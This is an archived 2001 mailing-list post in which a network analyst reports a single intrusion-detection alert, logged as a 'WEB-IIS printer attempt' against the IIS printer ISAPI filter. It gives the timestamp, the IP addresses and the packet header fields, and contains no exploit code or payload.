Attempted WEB-IIS printer attempt Buffer Overflow

From: Jason Robertson (jasonat_private)
Date: Mon Jul 16 2001 - 18:49:51 PDT


    Date of Attack:  Jul 14, 2001
    Time of Attack: 09:00:38 am EDT
    
    Source of Attack: 
    IP Address: 198.109.163.170
    
    Destination of Attack:
    IP Address: 216.18.61.98
    Port: 80
    Protocol: TCP
    
    
    Description: 
    - Intruder attempted to access the printer ISAPI filter.
    
    Link: http://www.whitehats.com/info/IDS533
    
    Jason Robertson
    Network Analyst - iFuture Inc.
    http://www.ifuture.com
    
    
    [**] WEB-IIS printer attempt [**]
    Jul 14,01 09:00:38am    198.109.163.170:3265 -> 216.18.61.98:80
    TTL: 46 TOS: 0x0        ID:1675
    ***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120
    
    
    
    ---
    Jason Robertson                
    Network Analyst            
    jasonat_private    
    http://www.astroadvice.com      
    
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 10:21:26 PDT